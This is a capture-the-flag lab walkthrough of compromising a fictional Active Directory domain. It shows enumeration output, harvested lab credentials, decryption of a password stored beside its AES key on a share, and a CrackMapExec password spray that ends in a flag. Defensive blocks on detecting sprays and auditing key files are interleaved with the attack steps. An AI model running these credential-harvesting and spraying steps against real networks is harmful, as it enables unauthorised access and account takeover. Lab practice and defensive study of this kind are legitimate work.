Initial Compromise

Enumeration

Core.cyber.local

SMB         10.9.15.10      445    COREDC           [*] Windows 10.0 Build 14393 x64 (name:COREDC) (domain:core.cyber.local) (signing:True) (SMBv1:False)
SMB         10.9.15.12      445    COREWEBTW        [*] Windows 10.0 Build 14393 x64 (name:COREWEBTW) (domain:core.cyber.local) (signing:True) (SMBv1:False)
SMB         10.9.15.200     445    COREWKT001       [*] Windows 10.0 Build 18362 x64 (name:COREWKT001) (domain:core.cyber.local) (signing:True) (SMBv1:False)
SMB         10.9.15.201     445    COREWKT002       [*] Windows 10.0 Build 18362 x64 (name:COREWKT002) (domain:core.cyber.local) (signing:True) (SMBv1:False)

10.9.15.11    80    COREWEBDL

Cyber.local

HTTP        10.9.10.10      5985   CYDC
HTTP        10.9.10.14      5985   CYFS
HTTP        10.9.10.11      5985   CYADFS
HTTP        10.9.10.12      5985   CYWAP
HTTP        10.9.10.13      5985   CYMX
HTTP        10.9.10.17      5985   CYGW

D3v.local

HTTP        10.9.30.10      5985   D3DC             [-] d3v.local\george.wirth:v765#QLm^8
HTTP        10.9.30.12      5985   D3WEBJW          [-] d3v.local\george.wirth:v765#QLm^8
HTTP        10.9.30.13      5985   D3WEBVW          [-] d3v.local\george.wirth:v765#QLm^8
HTTP        10.9.30.200     5985   D3WKT001         [*] http://10.9.30.200:5985/wsman

Inception.local

SMB         10.9.40.5       445    INDC             [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
SMB         10.9.40.12      445    INWEBJW          [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
SMB         10.9.40.200     445    INWKT001         [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
SMB         10.9.40.201     445    INWKT002         [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE

Having valid domain creds

  • No Kerberoasting entries (no SPN-bearing accounts returned) when querying core.cyber.local as george.wirth

On the website

To Everyone:

In an effort to increase our security posture, we have moved forward with user certificate authentication. If you haven’t had the opportunity to come into the office or are using your own devices, you can request a certificate via the certenroll API (see below). For more information on this process check out https://blogs.technet.microsoft.com/askds/2010/05/25/enabling-cep-and-ces-for-enrolling-non-domain-joined-computers-for-certificates/. If you’re still having issues email Ilene_Rasch@cyber.local over at Help Desk.

Furthermore, we have started to roll out our network segmentation plan to only allow business related traffic. We also deployed Zabbix with an API to increase our systems/network visibility. The process is simple: the zabapi user logs in, collects information and sends it back to the console.

Requesting a user certificate can only be done from a Windows machine.

  1. Request a certificate from https://certenroll.cyber.local/ADPolicyProvider_CEP_UsernamePassword/service.svc/CEP  (Public IP: 10.10.110.11. Requires RootCA from the parent SYSVOL directory)

  2. Once you have a certificate you can authenticate to Email and Jenkins

User Email: https://mail.cyber.local/owa (Public IP: 10.10.110.12)

Jenkins: https://jenkins.cyber.local (Public IP: 10.10.110.12. Only DevOPS can authenticate to this portal)

Have a wonderful day!

So we need certificates

Accessing SMB shares

Getting Certificates

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'
/usr/local/bin/smbclient.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0.dev1+20230921.20754.9c8f344b', 'smbclient.py')
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 .
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 ..
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 cyber.local
# cd cyber.local
# ls
drw-rw-rw-          0  Tue Dec 31 07:23:38 2019 .
drw-rw-rw-          0  Tue Dec 31 07:23:38 2019 ..
drw-rw-rw-          0  Thu Dec 14 04:16:17 2023 DfsrPrivate
drw-rw-rw-          0  Wed Jun 17 22:34:20 2020 Policies
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 scripts
# cd scripts
# ls
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 .
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 ..
-rw-rw-rw-       1472  Fri Jan 15 17:10:22 2021 ADFS-Token.cer
-rw-rw-rw-        468  Fri Jan 10 01:58:27 2020 cydc.cyber.local_Cyber-CA.crt
-rw-rw-rw-        200  Fri Jan 10 02:19:51 2020 Disable-NetBIOS.ps1
-rw-rw-rw-    1019904  Fri Jan 10 13:07:53 2020 LAPSx64.msi
-rw-rw-rw-       3723  Fri Jan 10 01:58:27 2020 WildCard.pfx
# mget *
[*] Downloading ADFS-Token.cer
[*] Downloading cydc.cyber.local_Cyber-CA.crt
[*] Downloading Disable-NetBIOS.ps1
[*] Downloading LAPSx64.msi
[*] Downloading WildCard.pfx
# exit

Enumerating other shares

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.20.14'
# use GroupShare
# ls
drw-rw-rw-          0  Sat Dec 16 15:54:39 2023 .
drw-rw-rw-          0  Sat Dec 16 15:54:39 2023 ..
-rw-rw-rw-        298  Sun Jan 12 01:30:42 2020 aes.key
-rw-rw-rw-        278  Sun Jan 12 01:30:42 2020 passwd.txt
-rw-rw-rw-         95  Sun Jan 12 01:30:42 2020 ReadMe.txt

Decrypting Credentials from an SMB Share

While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.

I started by loading the content of aes.key into a variable using the command:

$Key = Get-Content -Path C:\Users\jay\Desktop\aes.key

This command read the contents of the aes.key file and stored it in the $Key variable. Next, I needed to load the encrypted message from the passwd.txt file. I achieved this with the following command:

$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"

With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell offers a convenient way to handle encrypted strings through its SecureString object. I used the ConvertTo-SecureString cmdlet, which is designed to convert encrypted data into a SecureString object, using the key I had just loaded. The command was as follows:

$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $Key

Upon executing this command, the encrypted message was converted into a SecureString, a special kind of string in PowerShell that is used for handling sensitive information securely.

However, SecureString objects are not immediately readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation since it involves handling a password in an unencrypted form. To do this, I used the .NET class System.Runtime.InteropServices.Marshal which provides methods for dealing with unmanaged code. The commands were:

$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)

These commands converted the SecureString to a plain text string and then freed the allocated memory to maintain security. Finally, I displayed the decrypted password using:

echo $PlainTextPassword

The output revealed the decrypted password: to7oxaith2Vie9. This successful decryption indicated that the files I found were indeed a key and an encrypted password, and I had managed to uncover the latter using PowerShell’s capabilities.
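The point worth taking away from the two files above is that a SecureString exported with -Key is only as secret as the key file stored next to it: the blob carries no binding to a user or a machine, so any principal that can read both files gets the plaintext back. The following PowerShell is an added example, not code from the original writeup. It recreates an aes.key / passwd.txt pair in a temporary folder with a constructed secret and random key bytes, recovers the secret from the two files exactly as the section above does, contrasts that with the DPAPI-protected form (ConvertFrom-SecureString without -Key), and finishes with a small audit check for share folders that hold a key file beside a keyed blob. The audit check relies on the fixed header string that ConvertFrom-SecureString -Key prefixes to its output; the folder path and the detection thresholds are assumptions of this example.

```powershell
# Added example, not from the original writeup. All paths, secrets and key bytes are constructed here.
$Folder = Join-Path $env:TEMP 'keyed-securestring-demo'
New-Item -ItemType Directory -Path $Folder -Force | Out-Null

# --- How a pair like aes.key / passwd.txt comes to exist ---
# 32 random bytes = an AES-256 key. Set-Content writes one decimal byte per line,
# which is why Get-Content on such a file can be handed straight to -Key.
$Key = New-Object byte[] 32
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($Key)
$Key | Set-Content -Path (Join-Path $Folder 'aes.key')

$Secret = ConvertTo-SecureString -String 'ExampleP@ss-not-real' -AsPlainText -Force   # constructed secret
ConvertFrom-SecureString -SecureString $Secret -Key $Key |
    Set-Content -Path (Join-Path $Folder 'passwd.txt')

# --- Recovery needs only read access to both files: no user or machine binding ---
function Unprotect-KeyedSecureString {
    param([string]$BlobPath, [string]$KeyPath)
    [byte[]]$k = Get-Content -Path $KeyPath                       # string[] of decimals -> byte[]
    $ss  = Get-Content -Path $BlobPath | ConvertTo-SecureString -Key $k
    $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($ss)
    try     { [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr) }
    finally { [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr) }   # scrub the unmanaged copy
}
$Recovered = Unprotect-KeyedSecureString -BlobPath (Join-Path $Folder 'passwd.txt') `
                                         -KeyPath  (Join-Path $Folder 'aes.key')
"Recovered from the two files: $Recovered"

# --- DPAPI form: nothing to leak beside the blob, but tied to this user on this host ---
$DpapiBlob = ConvertFrom-SecureString -SecureString $Secret        # no -Key: protected with the user's DPAPI master key
$null = ConvertTo-SecureString -String $DpapiBlob                  # round-trips here...
# ...but the same string fed to ConvertTo-SecureString as another user or on another
# machine fails with "Key not valid for use in specified state", which is exactly the
# property a keyed blob sitting on a file share does not have.

# --- Audit check: a folder holding a *.key file next to a blob in the -Key output format ---
function Test-KeyBesideBlob {
    param([string]$Path)
    $keys  = @(Get-ChildItem -Path $Path -File | Where-Object Extension -eq '.key')
    $blobs = @(Get-ChildItem -Path $Path -File |
               Where-Object { $_.Extension -in '.txt', '.xml', '.cred' } |
               Where-Object { (Get-Content -Path $_.FullName -Raw) -match '^76492d1116743f0423413b16050a5345' })
    [pscustomobject]@{
        Path       = $Path
        KeyFiles   = $keys.Count
        KeyedBlobs = $blobs.Count
        Exposed    = ($keys.Count -gt 0 -and $blobs.Count -gt 0)   # True for the folder created above
    }
}
Test-KeyBesideBlob -Path $Folder
Remove-Item -Path $Folder -Recurse -Force
```

Run it in any Windows PowerShell 3+ or PowerShell 7 session; no elevation is needed. The design choice the contrast illustrates: a keyed blob is the right tool only when the key is delivered through a channel the blob's readers do not share (a vault, an operator-held secret), and the DPAPI form is the right tool for secrets that only ever need to be read back by the account that wrote them. Neither is a substitute for not leaving credentials on a group share at all.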

Preparing for password spray

cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt

awk '/LDAP/{print $5}' users.txt > only_users.txt

Password Spray

cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'

LDAP        10.9.10.10      389    CYDC             [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9
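A spray like the one above leaves a distinctive trace on the domain controller: one source, one password, many distinct accounts and roughly one failure per account in a short window, which is the opposite shape from a single user mistyping their password or a lockout-driven brute force against one account. The PowerShell below is an added example, not part of the original writeup, showing detection logic for that pattern. The $Events array is constructed sample data carrying the fields a failed-logon record exposes (source address, target account, NTSTATUS); on a real DC the same objects would be built from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} output. The thresholds and window size are assumptions to tune per environment.

```powershell
# Added example, not from the original writeup. $Events is constructed sample data.
$Base = [datetime]'2023-12-16T10:00:00'
$Events = @(1..12 | ForEach-Object {
    # the spray: twelve accounts, five seconds apart, one wrong-password failure each
    [pscustomobject]@{ Time = $Base.AddSeconds(5 * $_); Source = '10.9.10.50'
                       Account = ('user{0:d2}' -f $_);  Status = '0xC000006A' }
}) + @(1..3 | ForEach-Object {
    # one user mistyping their own password three times: not a spray
    [pscustomobject]@{ Time = $Base.AddMinutes($_); Source = '10.9.15.200'
                       Account = 'jane.doe';          Status = '0xC000006A' }
})

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinAccounts   = 5,     # distinct accounts from one source before it is reported
        [int]$WindowMinutes = 10     # bucket size; shorter windows catch faster sprays
    )
    $ticks = [timespan]::FromMinutes($WindowMinutes).Ticks
    $Events |
        # 0xC000006A = wrong password, 0xC0000064 = no such user; both show up in a spray
        Where-Object { $_.Status -in '0xC000006A', '0xC0000064' } |
        # group by source address and by fixed time bucket
        Group-Object -Property { $_.Source }, { [math]::Floor($_.Time.Ticks / $ticks) } |
        ForEach-Object {
            $accounts = @($_.Group.Account | Sort-Object -Unique)
            if ($accounts.Count -ge $MinAccounts) {
                $ordered = $_.Group | Sort-Object Time
                [pscustomobject]@{
                    Source     = $_.Group[0].Source
                    FirstSeen  = $ordered[0].Time
                    LastSeen   = $ordered[-1].Time
                    Accounts   = $accounts.Count
                    Attempts   = $_.Count
                    PerAccount = [math]::Round($_.Count / $accounts.Count, 2)   # ~1 is the spray signature
                }
            }
        }
}

Find-PasswordSpray -Events $Events | Format-Table -AutoSize
# Reports one row for 10.9.10.50 (Accounts 12, Attempts 12, PerAccount 1); 10.9.15.200 is not reported.
```

PerAccount close to 1 with a high Accounts value is the signal to alert on; a high Attempts count against one or two accounts is a different problem (brute force or a misconfigured service) and deserves a separate rule rather than a lower MinAccounts here.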

What can user robert.ortiz access?

cme smb 10.9.10.14 -u robert.ortiz -p 'to7oxaith2Vie9' -d cyber.local --shares

smbclient.py 'cyber.local/robert.ortiz:to7oxaith2Vie9@10.9.10.14'
Type help for list of commands
# use devops
# ls
drw-rw-rw-          0  Sat Dec 16 19:24:21 2023 .
drw-rw-rw-          0  Sat Dec 16 19:24:21 2023 ..
-rw-rw-rw-         70  Mon Jun  8 00:51:39 2020 flag.txt
# cat flag.txt
Cyb3rN3t1C5{D3vOP$_S3cure_Cr3d$}

On Windows

Log on as a local computer administrator account.

  • You can add the Root CA certificate to the computer's Trusted Root Certification Authorities store via the MMC:

    1. Open the Run command and type MMC.
      1. Select File then Add/Remove Snap-in
      2. Select Certificates, and click the Add > button.
      3. Select Computer Account, and click the Next button.
      4. Click the Finish button.
      5. Click OK
    2. Expand Certificates (Local Computer).
    3. Expand Trusted Root Certification Authorities.
    4. Right-click on Certificates, select All Tasks, and then select Import.
      1. Certificate Import Wizard comes up.
      2. Click the Next button.
      3. Click the Browse… button and navigate to the CER file.
      4. Click the Next button.
      5. Leave the defaults, and click the Next button.
      6. Click the Finish button.
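The same import can be scripted from an elevated PowerShell prompt, which also makes it easy to add the checks that the MMC wizard does not prompt for: anything placed in the machine Root store can issue certificates for every name this host trusts, so the file pulled from SYSVOL should be confirmed against a fingerprint obtained a second way (from the CA itself, the CA object published in AD, or the PKI owners) before it is imported. The function below is an added example, not from the original writeup; -CerPath and -ExpectedThumbprint are the caller's inputs, and no real thumbprint is assumed here.

```powershell
# Added example, not from the original writeup: scripted equivalent of the MMC import
# with verification. Requires the PKI module (Windows 8 / Server 2012 and later).
function Import-VerifiedRootCA {
    param(
        [Parameter(Mandatory)][string]$CerPath,             # .cer/.crt file, DER or PEM
        [Parameter(Mandatory)][string]$ExpectedThumbprint   # SHA-1 fingerprint confirmed out of band
    )
    $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $CerPath

    # 1. Root store entries are self-issued; an intermediate belongs in the CA store, not Root.
    if ($cert.Subject -ne $cert.Issuer) {
        throw "Not self-issued: subject '$($cert.Subject)', issuer '$($cert.Issuer)'"
    }

    # 2. BasicConstraints must mark it as a CA; an end-entity cert has no business in Root.
    $bc = $cert.Extensions |
          Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509BasicConstraintsExtension] }
    if (-not $bc -or -not $bc.CertificateAuthority) {
        throw "BasicConstraints does not mark this certificate as a CA"
    }

    # 3. Validity window: an expired root only produces confusing chain failures later.
    $now = Get-Date
    if ($now -lt $cert.NotBefore -or $now -gt $cert.NotAfter) {
        throw "Certificate not currently valid ($($cert.NotBefore) to $($cert.NotAfter))"
    }

    # 4. Thumbprint must equal the value confirmed through a second channel.
    $expected = ($ExpectedThumbprint -replace '[\s:]', '').ToUpperInvariant()
    if ($cert.Thumbprint -ne $expected) {
        throw "Thumbprint mismatch: file has $($cert.Thumbprint), expected $expected"
    }

    # 5. Idempotent: return the existing store entry if this CA is already trusted.
    $existing = Get-ChildItem -Path Cert:\LocalMachine\Root | Where-Object Thumbprint -eq $cert.Thumbprint
    if ($existing) { return $existing }

    # 6. Import into the machine Root store (needs local administrator rights).
    Import-Certificate -FilePath $CerPath -CertStoreLocation Cert:\LocalMachine\Root
}

# Usage with the CA file downloaded from SYSVOL earlier and a placeholder fingerprint:
# Import-VerifiedRootCA -CerPath .\cydc.cyber.local_Cyber-CA.crt -ExpectedThumbprint '<THUMBPRINT VERIFIED VIA A SECOND CHANNEL>'
```

Get-ChildItem Cert:\LocalMachine\Root afterwards shows the new entry; removing it again is Remove-Item on the same path by thumbprint, which is worth knowing before trusting a lab CA on a machine that will outlive the engagement.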

Using the information obtained above for lateral movement.

Lateral movement